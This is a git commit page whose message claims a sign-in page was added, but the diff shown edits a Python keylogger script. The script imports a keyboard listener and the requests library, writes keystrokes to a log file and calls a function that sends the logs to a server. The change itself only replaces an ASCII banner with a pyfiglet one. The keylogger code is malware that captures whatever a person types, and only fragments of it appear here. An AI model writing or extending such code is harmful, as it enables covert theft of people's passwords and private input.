Sign/Log in page was added with good layout, visuals and responsiveness

This commit is contained in:
Always-Amulya7
2025-09-04 22:04:47 +05:30
parent d75b15c7bd
commit 23cc0ab100
7 changed files with 445 additions and 104 deletions
+6 -14
View File
@@ -3,24 +3,16 @@ from pynput.keyboard import Listener, Key
import os
import requests
import time
import pyfiglet
# Use pyfiglet for CLI art as requested
ascii_banner = pyfiglet.figlet_format("KEY LOGGER")
print(ascii_banner)
print(r"""
_ __ _
| |/ /___ _ _ | | ___ __ _ __ _ ___ _ __
| ' // _ \ | | | | | / _ \ / _` |/ _` |/ _ \ '__|
| . \ __/ |_| | | |__| (_) | (_| | (_| | __/ |
|_|\_\___|\__, | |_____\___/ \__, |\__, |\___|_|
|___/ |___/ |___/
0.1
GitHub:https://github.com/Stalin-143
""")
# Ask user for the desired log file location
log_location = input("Please enter the full path for the log file (e.g., /path/to/logfile.txt): ")
@@ -100,4 +92,4 @@ with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
# Send logs when the listener stops (or periodically if needed)
send_log_to_server()
send_log_to_server()